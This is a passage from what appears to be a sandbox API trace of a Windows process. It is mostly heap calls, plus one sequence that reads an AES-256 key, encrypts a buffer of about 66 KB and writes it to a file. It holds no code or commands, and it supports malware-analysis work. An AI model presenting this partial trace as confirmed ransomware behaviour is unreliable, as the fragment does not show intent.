Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0077.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0077.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0077.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0077.606] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0077.606] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2680, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2680*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.608] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.609] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.609] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0077.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.610] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.611] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x10245, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x10250) returned 1 [0077.611] CharLowerBuffW (in: lpsz="byte[66129]", cchLength=0xb | out: lpsz="byte[66129]") returned 0xb [0077.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.615] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4920738*, pdwDataLen=0x144e790*=0x10245, dwBufLen=0x10250 | out: pbData=0x4920738*, pdwDataLen=0x144e790*=0x10250) returned 1 [0077.615] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.616] WriteFile (in: hFile=0x258, lpBuffer=0x49aa260*, nNumberOfBytesToWrite=0x10250, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa260*, lpNumberOfBytesWritten=0x144f194*=0x10250, lpOverlapped=0x0) returned 1 [0077.619] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca6b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.619] CryptDestroyKey (hKey=0x41ac540) returned 1 [0077.619] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.621] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.622] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 